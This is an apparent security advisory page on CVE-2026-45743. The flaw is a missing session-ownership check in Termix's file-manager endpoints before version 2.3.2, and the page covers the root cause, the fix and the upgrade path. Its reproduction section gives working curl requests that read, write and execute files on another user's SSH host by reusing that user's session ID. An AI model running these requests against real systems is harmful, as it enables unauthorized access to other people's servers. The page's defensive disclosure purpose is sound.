VYPR
← All advisories
High severity8.1NVD Advisory· Published Jun 5, 2026· Updated Jun 5, 2026

CVE-2026-45743

CVE-2026-45743

Description

Termix versions prior to 2.3.2 allow authenticated attackers to access files on other users' SSH hosts by guessing or knowing their session ID.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Termix versions prior to 2.3.2 allow authenticated attackers to access files on other users' SSH hosts by guessing or knowing their session ID.

Vulnerability

Termix, a web-based server management platform, has 16 file-manager endpoints that fail to verify if the requesting user owns the SSH session identified by sessionId. This vulnerability exists in versions prior to 2.3.2. The affected endpoints include resolvePath, readFile, writeFile, uploadFile, downloadFile, executeFile, deleteItem, renameItem, moveItem, createFile, createFolder, changePermissions, extractArchive, compressFiles, and identifySymlink [1].

Exploitation

An authenticated attacker needs to know or guess another user's active sessionId. The attacker can then send requests to the vulnerable file-manager endpoints, including readFile and writeFile, using the victim's sessionId to interact with files on the victim's connected SSH host [1].

Impact

Successful exploitation allows an attacker to read, write, delete, download, and execute files on the victim's connected SSH host. The attacker effectively gains the same file system privileges as the victim user on the remote host [1].

Mitigation

Termix version 2.3.2 addresses this vulnerability. Users should update to version 2.3.2 or later. No workarounds are specified in the available references [2].

References
  1. File-Manager Session Hijack via Missing Ownership Check (IDOR)
  2. Release release-2.3.2 · Termix-SSH/Termix

AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Termix SSH/Termixreferences2 versions
    (expand)+ 1 more
    • (no CPE)
    • (no CPE)range: <2.3.2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The file-manager endpoints in Termix do not verify that the requesting user owns the SSH session."

Attack vector

An authenticated attacker must know or guess another user's active `sessionId` [ref_id=1]. The attacker can then send requests to file-manager endpoints, such as `readFile` or `writeFile`, using the victim's `sessionId` to perform actions on the victim's connected SSH host [ref_id=1]. For example, an attacker can read arbitrary files or write to files on the victim's host by making authenticated requests with the victim's session ID [ref_id=1].

Affected code

The vulnerability exists in 16 file-manager endpoints within Termix prior to version 2.3.2. Specifically, endpoints like `resolvePath`, `readFile`, `writeFile`, `uploadFile`, `downloadFile`, `executeFile`, `deleteItem`, `renameItem`, `moveItem`, `createFile`, `createFolder`, `changePermissions`, `extractArchive`, `compressFiles`, and `identifySymlink` directly look up `sshSessions[sessionId]` without verifying ownership [ref_id=1].

What the fix does

The advisory indicates that the fix involves adding a `verifySessionOwnership(session, userId)` check to every endpoint that accesses `sshSessions[sessionId]` [ref_id=1]. Additionally, it is recommended to generate `sessionId` server-side instead of trusting the client [ref_id=1]. This ensures that only the owner of an SSH session can perform file management operations on it.

Preconditions

  • authThe attacker must be authenticated to the Termix application.
  • inputThe attacker must know or be able to guess the `sessionId` of an active SSH session belonging to another user.

Reproduction

Alice connects a file-manager session:

curl -b "$ALICE_COOKIES" -X POST https://target/ssh/file_manager/ssh/connect \ -H "Content-Type: application/json" \ -d '{"sessionId":"sess-alice-1","ip":"192.168.1.100","port":22,"username":"testuser","password":"testpass","authType":"password"}'

Bob reads files on Alice's host using Alice's session:

curl -b "$BOB_COOKIES" "https://target/ssh/file_manager/ssh/readFile?sessionId=sess-alice-1&path=/etc/hostname" # Response: {"content":"victim-host\n","path":"/etc/hostname","encoding":"utf8"}

Bob writes to Alice's host:

curl -b "$BOB_COOKIES" -X POST https://target/ssh/file_manager/ssh/writeFile \ -H "Content-Type: application/json" \ -d '{"sessionId":"sess-alice-1","path":"/tmp/idor-test","content":"IDOR_PROOF"}' # Response: {"message":"File written successfully"}

Bob executes commands on Alice's host:

curl -b "$BOB_COOKIES" -X POST https://target/ssh/file_manager/ssh/executeFile \ -H "Content-Type: application/json" \ -d '{"sessionId":"sess-alice-1","filePath":"/usr/bin/id"}' # Response: {"success":true,"exitCode":0,"output":"uid=1000(testuser) gid=1000(users) groups=1000(users)\nEXIT_CODE:0"} [ref_id=1]

Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

1